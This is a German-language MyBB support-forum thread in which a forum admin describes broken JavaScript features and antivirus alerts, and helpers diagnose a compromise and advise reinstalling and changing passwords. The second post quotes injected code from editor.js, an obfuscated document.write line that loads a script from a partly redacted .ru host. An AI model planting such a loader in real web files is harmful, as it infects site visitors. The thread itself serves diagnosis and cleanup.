Hallo, Gast! (Registrieren)

Letzte Ankündigung: MyBB 1.8.8 veröffentlicht (17.10.16)


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste
Virus im System?
#1
Hallo,

Ich habe zur Zeit massive Probleme mit meinem Forum...
Es scheint nach und nach an Funktionen zu verlieren, ohne dabei irgendwelche Fehlermeldungen auszugeben.
Das erste, was mir aufgefallen ist, dass der "Optionen" Button im ACP unter "Benutzer und Gruppen" plötzlich tot war.
Dann verschwand das Pop-Up beim Editbutton von Beiträgen, sodass der Inline-Editor nicht mehr verfügbar ist und man unmittelbar in das normale editierfenster weitergeleitet wird.
Dann verschwand die komplette Formatleiste bei der Beitragserstellung... Also das Dingen, wo die Buttons für fett, kursiv und co. drin sind.
Seit neustem sind nun auch die Smileys nicht mehr anklickbar. Sie werden zwar angezeigt (auch der "mehr" Button), aber man kann so viel darauf rumklicken, wie man möchte, es passiert einfach nichts.

Gut möglich, dass noch mehr Fehler vorliegen, die ich nur noch nicht entdeckt habe...
Hinzu kommt, dass ich gelegentlich eine Warnmeldung von meinem Virenscanner erhalte... Beispielsweise diese
Habe aber auch schon andere Meldungen über Trojaner erhalten, die geblockt wurden...

Kann ein Virus für die o.g. Fehler verantworltich sein? Wenn ja, wie kann ich das beheben? Und wenn nicht: Wie kann ich das trotzdem beheben und wodurch wird das ausgelöscht?
Die Fehler oben wurden mir übrigens von vielen Usern bestätigt, das ist nicht nur bei mir so... Habe mal einen Account angelegt, an dem ihr probieren könnt
User: Testuser, PW: test123
Adminrechte hat der allerdings keine Wink

Vielen Dank im Vorraus für eure Hilfe Smile

* Link wegen Maleware entfernt *
#2
Welche MyBB-Version setzt du ein? Der Beschreibung nach wird Javascript nicht mehr ausgeführt. Die Erklärung ist, dass jemand Schadcode in die Dateien eingeschleust hat. Am Ende der jscripts/editor.js steht beispielsweise (URL entfernt):
Code:
document.write('<sc'+'ript type="text/javascript" src="http://xxx.ru/YouTube.js"></scri'+'pt>');
Das gehört da nicht hin. Das Forum ist dadurch nicht mehr sicher, denn wer in die Dateien schreiben kann, hat sicherlich Zugriff auf alles.

Du solltest als erstes das Forum offline nehmen und mit den Originaldateien neu aufsetzen (und dann auf die aktuelle Version aktualisieren). Zudem solltest du die Passwörter für FTP, MySQL und Admin ändern. Außerdem musst du prüfen, dass keine User plötzlich Admin sind oder erweiterte Rechte haben.

Gruß,
Michael
[Bild: banner.png]
Support erfolgt NUR im Forum!
Bitte gelöste Themen als "erledigt" markieren.
Beiträge mit mangelhafter Rechtschreibung/Grammatik werden kommentarlos gelöscht.
#3
verwende MyBB 1.4.11...
mit "neu aufsetzen" meinst du, dass ich das Forum löschen und neu installieren soll, oder nicht..? Kann sich der Schadcode auch in Datein befinden, die ich bei einem Backup speichere, sodass die also wieder da sind, wenn man ich das BackUp lade?

Dass einer meiner User dafür verantwortlich ist, bezweifle ich... die kenne ich eigentlich alle recht gut. Werde dennoch vorsichtshalber mal die Profile checken.

Kann sich dieser jemand, der bei mir sein Unwesen treibt, über Plugins eingeschlichen haben? Ich habe eine GameSection im Forum, mit einigen Arcardespielen. Kann sich über ein solches Spiel jemand Zugriff verschafft haben?
#4
Wie der Zugriff erfolgte, kann man aus der Ferne nicht sagen.
[Bild: banner.png]

Bitte die Foren-Regeln beachten und im Profil die verwendete MyBB-Version angeben.
#5
Wenn du den Zeitpunkt einschränken kannst, finden sich möglicherweise Hinweise in den Logs des Servers. Ohne die kann man nur raten.

Gruß,
Michael
[Bild: banner.png]
Support erfolgt NUR im Forum!
Bitte gelöste Themen als "erledigt" markieren.
Beiträge mit mangelhafter Rechtschreibung/Grammatik werden kommentarlos gelöscht.
#6
Sooo... habe das Forum nun neu installiert und die Sicherung wieder drauf gezogen... Den Zeitpunkt des Angriffs kann ich nicht eingrenzen, daher werde ich die Ursache mal als "ungeklärt" ant akta legen.
Javascript funktioniert nun wieder tadellos, dafür sehe ich mich mit einer Fehlermeldung konfrontiert, mit der ich als Laie nicht all zu viel anfangen kann :/
Habe mal nen Screenshot gemacht. Der Screenshot zeigt nicht nur die Meldung selbst, sondern auch die Auswirkung des Fehlers: Bei der Beitragserstellung werden keine Smileys angezeigt.
Vielleicht kann mir ja einer von euch da helfen?

Achja und wenn ich hier schon was nachfrage, hab ich noch ne kleinere Frage:
Bei der Neuinstallation wurden sämtliche Umlaute in unlesbare Zeichen verwandelt. (Bsp: ä = ä) Gibt es ein Tool, womit ich diese Zeichen systematisch im ganzen Forum in Umlaute zurückverwandeln kann, oder geht das nur manuell?


Angehängte Dateien Thumbnail(s)
   
#7
1) Werden die Smilies im ACP korrekt gelistet? Falls ja speichere bitte einen neu ab. Ist das Problem damit behoben?

2) Siehe:
http://forum.mysqldumper.de/die-umlautpr...t2313.html
http://forum.mysqldumper.de/dsb-s-umlaut...t2406.html

Gruß,
Michael
[Bild: banner.png]
Support erfolgt NUR im Forum!
Bitte gelöste Themen als "erledigt" markieren.
Beiträge mit mangelhafter Rechtschreibung/Grammatik werden kommentarlos gelöscht.


Möglicherweise verwandte Themen...
Thema Verfasser Antworten Ansichten Letzter Beitrag
  Forum mit Virus infiziert Nevets 8 972 19.03.2010, 11:22
Letzter Beitrag: ows